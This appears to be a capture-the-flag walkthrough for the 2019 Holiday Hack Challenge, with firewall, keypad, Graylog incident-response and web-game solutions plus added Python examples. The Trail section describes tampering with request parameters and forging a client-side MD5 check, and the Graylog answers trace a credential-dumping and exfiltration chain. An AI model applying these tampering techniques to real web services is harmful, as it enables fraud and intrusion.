15410-92233720368547758082422Microsoft-Windows-Sysmon5770385f-c22a-43e0-bf4c-06f5698ffbd9Microsoft-Windows-Sysmon/Operational19606640elfuresearchSystem.Security.Principal.SecurityIdentifierSystem.Security.Principal.IdentityReferenceSystem.ObjectS-1-5-1812S-1-5-182019-11-07T09:59:56.5265735-08:00microsoft-windows-sysmon/operationalSystem.UInt32[]System.ArraySystem.ObjectSystem.Diagnostics.Eventing.Reader.EventBookmarkSystem.ObjectSystem.Diagnostics.Eventing.Reader.EventBookmarkInformationInfoProcess Create (rule: ProcessCreate)System.Collections.ObjectModel.ReadOnlyCollection`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]System.ObjectSystem.Collections.Generic.List`1[[System.Diagnostics.Eventing.Reader.EventProperty, System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]System.ObjectSystem.Diagnostics.Eventing.Reader.EventPropertySystem.ObjectSystem.Diagnostics.Eventing.Reader.EventPropertySystem.Diagnostics.Eventing.Reader.EventProperty2019-11-07 17:59:56.525System.Diagnostics.Eventing.Reader.EventPropertyba5c6bbb-5b9c-5dc4-0000-00107660a900System.Diagnostics.Eventing.Reader.EventProperty3664System.Diagnostics.Eventing.Reader.EventPropertyC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem.Diagnostics.Eventing.Reader.EventProperty10.0.14393.206 (rs1_release.160915-0644)System.Diagnostics.Eventing.Reader.EventPropertyWindows PowerShellSystem.Diagnostics.Eventing.Reader.EventPropertyMicrosoft® Windows® Operating SystemSystem.Diagnostics.Eventing.Reader.EventPropertyMicrosoft CorporationSystem.Diagnostics.Eventing.Reader.EventPropertyPowerShell.EXESystem.Diagnostics.Eventing.Reader.EventPropertyC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "`$correct_gases_postbody = @{`n    O=6`n    H=7`n    He=3`n    N=4`n    Ne=22`n    Ar=11`n    Xe=10`n    F=20`n    Kr=8`n    
Rn=9`n}`n"System.Diagnostics.Eventing.Reader.EventPropertyC:\System.Diagnostics.Eventing.Reader.EventPropertyELFURESEARCH\allservicesSystem.Diagnostics.Eventing.Reader.EventPropertyba5c6bbb-5b9c-5dc4-0000-0020f55ca900System.Diagnostics.Eventing.Reader.EventProperty11099381System.Diagnostics.Eventing.Reader.EventProperty0System.Diagnostics.Eventing.Reader.EventPropertyHighSystem.Diagnostics.Eventing.Reader.EventPropertyMD5=097CE5761C89434367598B34FE32893BSystem.Diagnostics.Eventing.Reader.EventPropertyba5c6bbb-4c79-5dc4-0000-001029350100System.Diagnostics.Eventing.Reader.EventProperty1008System.Diagnostics.Eventing.Reader.EventPropertyC:\Windows\System32\svchost.exeSystem.Diagnostics.Eventing.Reader.EventPropertyC:\Windows\system32\svchost.exe -k netsvcs

The important bit is $correct_gases_postbody = @{`n    O=6`n    H=7`n    He=3`n    N=4`n    Ne=22`n    Ar=11`n    Xe=10`n    F=20`n    Kr=8`n    Rn=9`n}

Answer

O=6 H=7 He=3 N=4 Ne=22 Ar=11 Xe=10 F=20 Kr=8 Rn=9
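The same "find the lonely event Id, then read its Properties" logic, written out in Python as an added example that is not part of the original writeup. Export-Clixml output is plain XML in the http://schemas.microsoft.com/powershell/2004/04 namespace, so the standard library parses it directly. The document below is a constructed stand-in for EventLog.xml, in the shape of the record quoted above; its property values are made up.

```python
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"ps": "http://schemas.microsoft.com/powershell/2004/04"}

# Constructed stand-in for EventLog.xml (not the challenge's file).
# Event Id 5 occurs twice and Id 3 twice; Id 1 is the lonely one.
SAMPLE_XML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>System.Diagnostics.Eventing.Reader.EventLogRecord</T><T>System.Object</T></TN>
    <Props><I32 N="Id">5</I32><I32 N="Version">2</I32>
      <Obj N="Properties" RefId="1"><LST><S>C:\\Windows\\system32\\svchost.exe</S></LST></Obj></Props>
  </Obj>
  <Obj RefId="2"><TNRef RefId="0" />
    <Props><I32 N="Id">3</I32><I32 N="Version">5</I32>
      <Obj N="Properties" RefId="3"><LST><S>10.0.0.5</S><S>443</S></LST></Obj></Props>
  </Obj>
  <Obj RefId="4"><TNRef RefId="0" />
    <Props><I32 N="Id">1</I32><I32 N="Version">5</I32>
      <Obj N="Properties" RefId="5"><LST><S>powershell.exe -c "$correct_gases_postbody = @{ O=6 }"</S></LST></Obj></Props>
  </Obj>
  <Obj RefId="6"><TNRef RefId="0" />
    <Props><I32 N="Id">5</I32><I32 N="Version">2</I32>
      <Obj N="Properties" RefId="7"><LST><S>C:\\Windows\\explorer.exe</S></LST></Obj></Props>
  </Obj>
  <Obj RefId="8"><TNRef RefId="0" />
    <Props><I32 N="Id">3</I32><I32 N="Version">5</I32>
      <Obj N="Properties" RefId="9"><LST><S>10.0.0.9</S><S>80</S></LST></Obj></Props>
  </Obj>
</Objs>"""


def parse_events(xml_text):
    """Return [(event_id, [property strings])] for each top-level <Obj> record."""
    events = []
    for obj in ET.fromstring(xml_text).findall("ps:Obj", NS):
        props = obj.find("ps:Props", NS)
        if props is None:
            continue
        # <I32 N="Id"> is the event Id; other I32 children (Version, ...) are ignored.
        ids = [int(i.text) for i in props.findall("ps:I32", NS) if i.get("N") == "Id"]
        # The Properties member is a list of strings under <Obj N="Properties"><LST>.
        values = [s.text for s in props.findall("ps:Obj[@N='Properties']/ps:LST/ps:S", NS)]
        events.append((ids[0] if ids else None, values))
    return events


def lonely_event_id(events):
    """The one event Id that appears exactly once (group | where Count -eq 1)."""
    counts = Counter(eid for eid, _ in events)
    singles = [eid for eid, n in counts.items() if n == 1]
    if len(singles) != 1:
        raise ValueError(f"expected exactly one unique Id, got {singles}")
    return singles[0]


def properties_of(events, event_id):
    """Property lists of every record carrying the given event Id."""
    return [values for eid, values in events if eid == event_id]


if __name__ == "__main__":
    ev = parse_events(SAMPLE_XML)
    lonely = lonely_event_id(ev)
    print("lonely event Id:", lonely)
    for values in properties_of(ev, lonely):
        print(values)
```

Grouping on the Id and filtering on a count of one is the step that matters: sorting the Ids with -Unique would only de-duplicate them and would not tell you which one is alone.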

10) Set the correct parameters

PS> (Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/refraction?val=1.867).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/temperature?val=-33.5).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/angle?val=65.5).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/gas -method post -body 'O=6&H=7&He=3&N=4&Ne=22&Ar=11&Xe=10&F=20&Kr=8&Rn=9').RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent

Success! - 6.09 Mega-Jollies of Laser Output Reached!

Misc

Common command abbreviations (aliases) used above:

Get-Content      gc
Get-ChildItem    gci
Get-Process      gps
Stop-Process     kill
ForEach-Object   %
Where-Object     where
Sort-Object      sort
Group-Object     group

Smart Braces

Goal

Help Kent configure the firewall on his braces.

Location

Student Union

Dialog

Kent Tinseltooth


Before Solving

OK, this is starting to freak me out!
Oh sorry, I'm Kent Tinseltooth. My Smart Braces are acting up.
Do... Do you ever get the feeling you can hear things? Like, voices?
I know, I sound crazy, but ever since I got these... Oh!
Do you think you could take a look at my Smart Braces terminal?
I'll bet you can keep other students out of my head, so to speak.
It might just take a bit of Iptables work.
From The Challenge

Inner Voice: Kent. Kent. Wake up, Kent.
Inner Voice: I'm talking to you, Kent.
Kent TinselTooth: Who said that? I must be going insane.
Kent TinselTooth: Am I?
Inner Voice: That remains to be seen, Kent. But we are having a conversation.
Inner Voice: This is Santa, Kent, and you've been a very naughty boy.
Kent TinselTooth: Alright! Who is this?! Holly? Minty? Alabaster?
Inner Voice: I am known by many names. I am the boss of the North Pole. Turn to me and be hired after graduation.
Kent TinselTooth: Oh, sure.
Inner Voice: Cut the candy, Kent, you've built an automated, machine-learning, sleigh device.
Kent TinselTooth: How did you know that?
Inner Voice: I'm Santa - I know everything.
Kent TinselTooth: Oh. Kringle. *sigh*
Inner Voice: That's right, Kent. Where is the sleigh device now?
Kent TinselTooth: I can't tell you.
Inner Voice: How would you like to intern for the rest of time?
Kent TinselTooth: Please no, they're testing it at srf.elfu.org using default creds, but I don't know more. It's classified.
Inner Voice: Very good Kent, that's all I needed to know.
Kent TinselTooth: I thought you knew everything?
Inner Voice: Nevermind that. I want you to think about what you've researched and studied. From now on, stop playing with your teeth, and floss more.
*Inner Voice Goes Silent*

Kent TinselTooth: Oh no, I sure hope that voice was Santa's.
Kent TinselTooth: I suspect someone may have hacked into my IOT teeth braces.
Kent TinselTooth: I must have forgotten to configure the firewall...
Kent TinselTooth: Please review /home/elfuuser/IOTteethBraces.md and help me configure the firewall.
Kent TinselTooth: Please hurry; having this ribbon cable on my teeth is uncomfortable.
Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!

If you don’t solve it fast enough:

Kent TinselTooth: Is the firewall fixed yet? I can't stand much more of having this cable on my teeth. You've got 5 more minutes before I'm yanking it!
Kent TinselTooth: One more minute before I'm yanking this cable!
Kent TinselTooth: I can't take it anymore!
*yanks cable from IOT braces - disconnected*
After Solving

Oh thank you! It's so nice to be back in my own head again. Er, alone.
By the way, have you tried to get into the crate in the Student Union? It has an interesting set of locks.
There are funny rhymes, references to perspective, and odd mentions of eggs!
And if you think the stuff in your browser looks strange, you should see the page source...
Special tools? No, I don't think you'll need any extra tooling for those locks.
BUT - I'm pretty sure you'll need to use Chrome's developer tools for that one.
Or sorry, you're a Firefox fan?
Yeah, Safari's fine too - I just have an ineffable hunger for a physical Esc key.
Edge? That's cool. Hm? No no, I was thinking of an unrelated thing.
Curl fan? Right on! Just remember: the Windows one doesn't like double quotes.
Old school, huh? Oh sure - I've got what you need right here...

Solution

Hint

Iptables

Answer

sudo iptables -P INPUT DROP
sudo iptables -P OUTPUT DROP
sudo iptables -P FORWARD DROP
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A INPUT -p tcp -s 172.19.0.225 --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp -m multiport --dports 21,80 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -i lo -j ACCEPT

Warning

If you’re having trouble submitting the firewall rules, ensure you didn’t “CTRL+C” the dialog. You can press enter to skip it.

Explanation

1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.

sudo iptables -P INPUT DROP
sudo iptables -P OUTPUT DROP
sudo iptables -P FORWARD DROP

2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.

sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).

sudo iptables -A INPUT -p tcp -s 172.19.0.225 --dport 22 -j ACCEPT

4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.

sudo iptables -A INPUT -p tcp -m multiport --dports 21,80 -j ACCEPT

5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.

sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.

sudo iptables -A INPUT -i lo -j ACCEPT

Rules in a chain are evaluated top to bottom and the first match wins; a packet that matches no rule falls through to the chain's policy, which is why the policies are set to DROP before anything else. Note what this ruleset does not allow: the braces can only initiate outbound TCP connections to port 80, so outbound DNS (UDP 53) and HTTPS are dropped. That is exactly what the challenge asks for, but it would break most real devices. -m state is the legacy spelling of -m conntrack --ctstate; either form works on current kernels.
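To check that the ruleset really does what the six steps claim, here is a small first-match evaluator for the subset of iptables syntax used above, written as an added example (it is not part of the original writeup and is not a reimplementation of netfilter). It parses the answer's command lines into policies and rules and then asks for the verdict on synthetic packets; the braces' own address (172.19.0.10) and the remote addresses are assumptions for the sample.

```python
import ipaddress
import shlex

# The ruleset from the answer above, parsed by the evaluator below.
RULESET = """
sudo iptables -P INPUT DROP
sudo iptables -P OUTPUT DROP
sudo iptables -P FORWARD DROP
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A INPUT -p tcp -s 172.19.0.225 --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp -m multiport --dports 21,80 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -i lo -j ACCEPT
"""

# Options that take one argument. "-m <module>" is consumed but carries no value itself;
# the module's own options (--state, --dports) are handled like any other option.
VALUE_OPTS = {"-p", "-s", "-d", "-i", "-o", "--dport", "--sport", "--dports", "--state", "-j"}


def parse_ruleset(text):
    """Parse the subset of iptables syntax used above into (policies, chains)."""
    policies = {}
    chains = {"INPUT": [], "OUTPUT": [], "FORWARD": []}
    for line in text.strip().splitlines():
        argv = shlex.split(line)
        if argv and argv[0] == "sudo":
            argv = argv[1:]
        args = argv[1:]                      # drop the 'iptables' word
        if args[0] == "-P":
            policies[args[1]] = args[2]
            continue
        if args[0] != "-A":
            raise ValueError(f"unsupported command: {line}")
        chain, rule, i = args[1], {}, 2
        while i < len(args):
            if args[i] == "-m":
                i += 2
            elif args[i] in VALUE_OPTS:
                rule[args[i]] = args[i + 1]
                i += 2
            else:
                raise ValueError(f"unsupported option {args[i]} in: {line}")
        chains[chain].append(rule)
    return policies, chains


def in_net(addr, spec):
    """-s/-d accept a bare address (treated as /32) or a CIDR block."""
    return ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)


def rule_matches(rule, pkt):
    """pkt keys: proto, src, dst, dport, sport, iface (in), oface (out), state."""
    checks = [
        ("-p", lambda v: v == pkt["proto"]),
        ("-s", lambda v: in_net(pkt["src"], v)),
        ("-d", lambda v: in_net(pkt["dst"], v)),
        ("-i", lambda v: v == pkt.get("iface")),
        ("-o", lambda v: v == pkt.get("oface")),
        ("--dport", lambda v: int(v) == pkt.get("dport")),
        ("--sport", lambda v: int(v) == pkt.get("sport")),
        ("--dports", lambda v: pkt.get("dport") in {int(p) for p in v.split(",")}),
        # A packet with no conntrack state is a NEW connection attempt.
        ("--state", lambda v: pkt.get("state", "NEW") in v.split(",")),
    ]
    return all(test(rule[opt]) for opt, test in checks if opt in rule)


def verdict(ruleset, chain, pkt):
    """First matching rule in the chain decides; otherwise the chain policy applies."""
    policies, chains = ruleset
    for rule in chains[chain]:
        if rule_matches(rule, pkt):
            return rule["-j"]
    return policies[chain]


def tcp(src, dst, dport, **extra):
    return {"proto": "tcp", "src": src, "dst": dst, "dport": dport, **extra}


if __name__ == "__main__":
    rs = parse_ruleset(RULESET)
    braces = "172.19.0.10"   # assumed address of the braces
    print("ssh from allowed host :", verdict(rs, "INPUT", tcp("172.19.0.225", braces, 22)))
    print("ssh from other host   :", verdict(rs, "INPUT", tcp("172.19.0.99", braces, 22)))
    print("outbound https        :", verdict(rs, "OUTPUT", tcp(braces, "93.184.216.34", 443)))
    print("outbound dns          :", verdict(rs, "OUTPUT", {"proto": "udp", "src": braces, "dst": "8.8.8.8", "dport": 53}))
```

The evaluator makes the two things that bite people visible: the ESTABLISHED rule is what lets replies to the allowed outbound port-80 traffic back in, and nothing in the ruleset permits new outbound DNS or HTTPS, so both come back as DROP.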

Frosty Keypad

Goal

Gain access to the Dorms

Location

The Quad

Dialog

Tangle Coalbox


Before Solving

Hey kid, it's me, Tangle Coalbox.
I'm sleuthing again, and I could use your help.
Ya see, this here number lock's been popped by someone.
I think I know who, but it'd sure be great if you could open this up for me.
I've got a few clues for you.
  1. One digit is repeated once.
  2. The code is a prime number.
  3. You can probably tell by looking at the keypad which buttons are used.
After Solving

Yep, that's it. Thanks for the assist, gumshoe.
Hey, if you think you can help with another problem, Prof. Banas could use a hand too.
Head west to the other side of the quad into Hermey Hall and find him in the Laboratory.

Solution

Answer

7331

Explanation

Looking at the keypad we can tell that the 1, 3, and 7 keys are the most worn. With Tangle's clues we know the code is prime and, since only three keys are used and one digit is repeated once, that it is four digits long. Given a list of four-digit primes, we can filter for numbers that contain only the digits 1, 3, and 7, then for numbers that contain each of 1, 3, and 7. That leaves five candidates.

https://en.wikipedia.org/wiki/List_of_prime_numbers

grep -E '^[137]{4}$' primes | grep 1 | grep 3 | grep 7
1373
1733
3137
3371
7331

Looking at this list, we notice that 7331 is 1337 ("leet") backwards. Trying this code gives us access to the dorms.
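The same filter without a prime list, as an added example that is not part of the original writeup: it generates the candidates directly from the three clues (prime, only the worn keys, every worn key used, exactly one digit repeated once). It is written generally over any set of worn keys and any code length; the values for this keypad are the 1, 3 and 7 keys and four digits.

```python
def is_prime(n):
    """Trial division; plenty fast for four- or five-digit codes."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    f = 3
    while f * f <= n:
        if n % f == 0:
            return False
        f += 2
    return True


def candidate_codes(worn_keys=("1", "3", "7"), length=4):
    """Codes of the given length that are prime, use only the worn keys,
    use every worn key at least once, and repeat exactly one digit once."""
    worn = set(worn_keys)
    out = []
    for n in range(10 ** (length - 1), 10 ** length):
        s = str(n)
        if set(s) != worn:                 # only worn keys, and all of them
            continue
        if len(s) - len(set(s)) != 1:      # exactly one digit appears twice
            continue
        if is_prime(n):
            out.append(s)
    return out


if __name__ == "__main__":
    for code in candidate_codes():
        print(code, "(1337 reversed)" if code == "7331" else "")
```

With three worn keys and a four-digit code the "one repeat" clue is implied by the other two, which is why the grep pipeline above never had to check it explicitly; the function checks it anyway so that it stays correct for other key and length combinations.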

Graylog

Goal

Use Graylog to trace an incident on ElfU’s machines.

Location

Dorms

Dialog

Pepper Minstix


Before Solving

It's me - Pepper Minstix.
Normally I'm jollier, but this Graylog has me a bit mystified.
Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala.
Some Elf U computers were hacked, and I've been tasked with performing incident response.
Can you help me fill out the incident response report using our instance of Graylog?
It's probably helpful if you know a few things about Graylog.
Event IDs and Sysmon are important too. Have you spent time with those?
Don't worry - I'm sure you can figure this all out for me!
Click on the All messages Link to access the Graylog search interface!
Make sure you are searching in all messages!
The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner.
Login with the username elfustudent and password elfustudent.
After Solving

That's it - hooray!
Have you had any luck retrieving scraps of paper from the Elf U server?
You might want to look into SQL injection techniques.
OWASP is always a good resource for web attacks.
For blind SQLi, I've heard Sqlmap is a great tool.
In certain circumstances though, you need custom tamper scripts to get things going!

Solution

Hint

Graylog

Explanation

Graylog challenge.

Question 1

Minty CandyCane reported some weird activity on his computer after he clicked on a link in Firefox for a cookie recipe and downloaded a file.

What is the full-path + filename of the first malicious file downloaded by Minty?

Answer

C:\Users\minty\Downloads\cookie_recipe.exe

We can look for file-write events from Firefox into the Downloads folder. (Sysmon event 2 is "file creation time changed" rather than FileCreate, event 11; finished browser downloads commonly trigger it, which is why it catches the download here.)

EventID:2 AND ProcessImage:/.*firefox\.exe/ AND TargetFilename:/.*Downloads.*/

Question 2

The malicious file downloaded and executed by Minty gave the attacker remote access to his machine. What was the ip:port the malicious file connected to first?

Let’s look for cookie_recipe’s processes where a destination ip exists.

_exists_:DestinationIp AND ProcessImage:C\:\\Users\\minty\\Downloads\\cookie_recipe.exe

Answer

192.168.247.175:4444

Question 3

What was the first command executed by the attacker?(answer is a single word)

We can filter on cookie_recipe.exe as the parent process and see what it spawns.

source:"elfu\-res\-wks1" AND ParentProcessCommandLine:\"C\:\\Users\\minty\\Downloads\\cookie_recipe.exe\"

Answer

whoami

Question 4

What is the one-word service name the attacker used to escalate privileges?

Using the same search as before, if we keep stepping through the commands, we’ll see our answer.

source:"elfu\-res\-wks1" AND ParentProcessCommandLine:\"C\:\\Users\\minty\\Downloads\\cookie_recipe.exe\"

Answer

webexservice

Question 5

What is the file-path + filename of the binary run by the attacker to dump credentials?

During our last query we should have seen cookie_recipe downloading cookie_recipe2. Looking at what cookie_recipe2 does, we see it attempting to steal credentials with mimikatz. It's not clear what happens, but we can see the attacker trying several times, eventually downloading a binary called cookie.exe and running it with mimikatz parameters.

source:"elfu\-res\-wks1"  AND ParentProcessImage:C\:\\Users\\minty\\Downloads\\cookie_recipe2.exe

Answer

C:\cookie.exe

Question 6

The attacker pivoted to another workstation using credentials gained from Minty’s computer. Which account name was used to pivot to another machine?

A successful logon generates Windows event 4624. Combining that with the attacker's IP address from question 2 gives us the answer.

EventID:4624 AND SourceNetworkAddress:192.168.247.175

Answer

alabaster

Question 7

What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection to another machine?

Using the same search as in 6, we filter for logon type 10, the code for a RemoteInteractive (Remote Desktop) logon.

EventID:4624 AND SourceNetworkAddress:192.168.247.175 AND LogonType:10

Answer

06:04:28

Question 8

The attacker navigates the file system of a third host using their Remote Desktop Connection to the second host. What is the SourceHostName,DestinationHostname,LogonType of this connection? (submit in that order as csv)

Again looking for successful logons, we can filter for logon type 3, a network logon, which is what you see when a file system is browsed remotely over SMB (for example via Explorer or net use). Since we know we're not looking for elfu-res-wks2 as the destination, we can exclude it from the search.

EventID:4624 AND LogonType:3 AND NOT DestinationHostname:elfu\-res\-wks2

Answer

elfu-res-wks2,elfu-res-wks3,3

Question 9

What is the full-path + filename of the secret research document after being transferred from the third host to the second host?

Again we can look for file-creation events with EventID 2 and specify the source machine. To pare down the results, we can limit the timeframe to after the authentication in question 8.

source:elfu\-res\-wks2 AND EventID:2

Answer

C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf

Question 10

What is the IPv4 address (as found in logs) the secret research document was exfiltrated to?

Continuing from our previous search, if we expand the timeframe and step through the events, we'll see a PowerShell process POSTing out to pastebin. The IP can be found in the event immediately following the PowerShell process.

Answer

104.22.3.84
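The ten questions are one incident timeline: download, first C2 connection, child commands of the implant, then lateral movement via 4624 events. As an added example that is not part of the original writeup and is not Graylog code, the block below walks that chain over a handful of constructed event records whose field names mirror the normalized names used in the queries above (EventID, ProcessImage, TargetFilename, DestinationIp, ParentProcessImage, SourceNetworkAddress, LogonType, and so on). The records are made up; AccountName, the wks2 source address and the second command line are assumptions for the sample.

```python
# Constructed Sysmon/Security records (not the challenge's data), oldest first.
EVENTS = [
    {"timestamp": "2019-11-19T05:24:01Z", "source": "elfu-res-wks1", "EventID": 2,
     "ProcessImage": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "TargetFilename": "C:\\Users\\minty\\AppData\\Local\\Temp\\dl-cache.tmp"},
    {"timestamp": "2019-11-19T05:24:02Z", "source": "elfu-res-wks1", "EventID": 2,
     "ProcessImage": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "TargetFilename": "C:\\Users\\minty\\Downloads\\cookie_recipe.exe"},
    {"timestamp": "2019-11-19T05:24:10Z", "source": "elfu-res-wks1", "EventID": 3,
     "ProcessImage": "C:\\Users\\minty\\Downloads\\cookie_recipe.exe",
     "DestinationIp": "192.168.247.175", "DestinationPort": 4444},
    {"timestamp": "2019-11-19T05:24:11Z", "source": "elfu-res-wks1", "EventID": 1,
     "ParentProcessImage": "C:\\Users\\minty\\Downloads\\cookie_recipe.exe",
     "ProcessImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"timestamp": "2019-11-19T05:24:30Z", "source": "elfu-res-wks1", "EventID": 1,
     "ParentProcessImage": "C:\\Users\\minty\\Downloads\\cookie_recipe.exe",
     "ProcessImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c ipconfig /all"},
    {"timestamp": "2019-11-19T05:30:00Z", "source": "elfu-res-wks1", "EventID": 2,
     "ProcessImage": "C:\\Users\\minty\\Downloads\\cookie_recipe.exe",
     "TargetFilename": "C:\\Users\\minty\\Downloads\\cookie_recipe2.exe"},
    {"timestamp": "2019-11-19T06:04:28Z", "source": "elfu-res-wks2", "EventID": 4624,
     "LogonType": 10, "SourceNetworkAddress": "192.168.247.175", "AccountName": "alabaster",
     "SourceHostName": "elfu-res-wks1", "DestinationHostname": "elfu-res-wks2"},
    {"timestamp": "2019-11-19T06:10:00Z", "source": "elfu-res-wks3", "EventID": 4624,
     "LogonType": 3, "SourceNetworkAddress": "192.168.247.180", "AccountName": "alabaster",
     "SourceHostName": "elfu-res-wks2", "DestinationHostname": "elfu-res-wks3"},
]


def by_time(events):
    return sorted(events, key=lambda e: e["timestamp"])


def first_download(events, browser="firefox.exe", folder="\\downloads\\"):
    """Q1: first file a browser wrote into a Downloads folder (cache writes are skipped)."""
    for e in by_time(events):
        if (e.get("EventID") == 2
                and e.get("ProcessImage", "").lower().endswith(browser)
                and folder in e.get("TargetFilename", "").lower()):
            return e["TargetFilename"]
    return None


def first_connection(events, image):
    """Q2: first network connection (Sysmon event 3) made by the given image."""
    for e in by_time(events):
        if e.get("EventID") == 3 and e.get("ProcessImage", "").lower() == image.lower():
            return f'{e["DestinationIp"]}:{e["DestinationPort"]}'
    return None


def child_commands(events, parent_image):
    """Q3/Q4: command lines spawned by the implant, oldest first."""
    return [e["CommandLine"] for e in by_time(events)
            if e.get("EventID") == 1
            and e.get("ParentProcessImage", "").lower() == parent_image.lower()]


def logons_from(events, source_ip, logon_type=None):
    """Q6/Q7: successful logons (4624) from the attacker's address, optionally by type."""
    return [(e["timestamp"], e["AccountName"], e["DestinationHostname"], e["LogonType"])
            for e in by_time(events)
            if e.get("EventID") == 4624 and e.get("SourceNetworkAddress") == source_ip
            and (logon_type is None or e["LogonType"] == logon_type)]


def network_logons_excluding(events, exclude_host):
    """Q8: type-3 (network) logons, excluding the host we already know about."""
    return [(e["SourceHostName"], e["DestinationHostname"], e["LogonType"])
            for e in by_time(events)
            if e.get("EventID") == 4624 and e.get("LogonType") == 3
            and e.get("DestinationHostname") != exclude_host]


def walk_chain(events):
    """Pivot from one answer to the next the way the questions do."""
    dropper = first_download(events)
    c2 = first_connection(events, dropper)
    cmds = child_commands(events, dropper)
    attacker_ip = c2.split(":")[0] if c2 else None
    return {
        "dropper": dropper,
        "c2": c2,
        "first_command": cmds[0].split()[-1] if cmds else None,
        "rdp": logons_from(events, attacker_ip, logon_type=10),
        "pivot": network_logons_excluding(events, "elfu-res-wks2"),
    }


if __name__ == "__main__":
    for k, v in walk_chain(EVENTS).items():
        print(f"{k:14}: {v}")
```

Each function is the Python equivalent of one Graylog query above; the point of walk_chain is that every answer feeds the next filter, so a wrong pivot early on (for example taking the cache write as the download) derails everything after it.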

Holiday Hack Trail

Goal

Make it to the KringleCon before Christmas (without dying).

Location

Dorms

Dialog

Minty Candycane


Before Solving

Hi! I'm Minty Candycane!
I just LOVE this old game!
I found it on a 5 1/4" floppy in the attic.
You should give it a go!
If you get stuck at all, check out this year's talks.
One is about web application penetration testing.
Good luck, and don't get dysentery!
After Solving

You made it - congrats!
Have you played with the key grinder in my room? Check it out!
It turns out: if you have a good image of a key, you can physically copy it.
Maybe you'll see someone hopping around with a key here on campus.
Sometimes you can find it in the Network tab of the browser console.
Deviant has a great talk on it at this year's Con.
He even has a collection of key bitting templates for common vendors like Kwikset, Schlage, and Yale.

Explanation

Easy

All of the parameters for supplies and progress are carried in the GET request, which means they can be manipulated in the URL bar. There is no server-side validation of the parameters, so to complete the game all one needs to do is change the distance parameter to 8000 (the total distance needed) and click "Go". This jumps straight to the completion screen.

hhc://trail.hhc/trail/?difficulty=0&distance=8000&money=5000&pace=0&curmonth=7&curday=1&reindeer=2&runners=2&ammo=100&meds=20&food=400&name0=Chloe&health0=100&cond0=0&causeofdeath0=&deathday0=0&deathmonth0=0&name1=Joseph&health1=100&cond1=0&causeofdeath1=&deathday1=0&deathmonth1=0&name2=Herbert&health2=100&cond2=0&causeofdeath2=&deathday2=0&deathmonth2=0&name3=Jane&health3=100&cond3=0&causeofdeath3=&deathday3=0&deathmonth3=0
_images/hht.png

The important parameters in the game are:

param       info
difficulty  difficulty level (0 == easy, 1 == medium, 2 == hard)
distance    distance you travelled (max: 8000)
money       $$$ (max: 6000)
curmonth    current month (we hope you can figure this one out)
curday      current day (we didn't validate each month)
reindeer    number of reindeer (max: 255)
runners     number of sleigh runners (max: 255)
ammo        to hunt if you need food (max: 65535)
meds        to heal sick folks, maybe (max: 65535)
food        vittles (max: 65535)

It was simple to find the maximums for the parameters in easy mode by increasing each one until you get a message complaining about a bad parameter (the 255 and 65535 limits line up with unsigned 8- and 16-bit integers, which suggests how the server stores them). In the screenshot below, you can see that the money was increased beyond what is allowed and the error "badMoneyAmt" was triggered.

_images/badMoneyAmt.png
Medium

_images/burp_httphistory.png

To manipulate the POST parameters, you can go to the “Intercept” tab and change the parameters just as in easy mode. There is no server-side verification of what the client is sending.

_images/burp_intercept.png

By using the table above to set the maximums for the POST parameters, you can complete the game and get the max score.

_images/highscore_med.png
Hard

_images/burp_hard_hash.png

If you attempt to manipulate the parameters now, the hash will be incorrect and you will fall off the trail.

_images/badhash.png

Looking at the hash, it appears to be an MD5 checksum. It turns out that the MD5 is generated by adding up the values of reindeer, runners, money, distance, curmonth, curday, food, ammo, and meds and hashing the decimal sum as a string. Because the hash is computed only from values the client controls, anyone who knows the recipe can re-sign tampered parameters. It's important not to let a trailing newline sneak into the string you feed to md5sum, so we were careful to use the -n flag with /bin/echo.

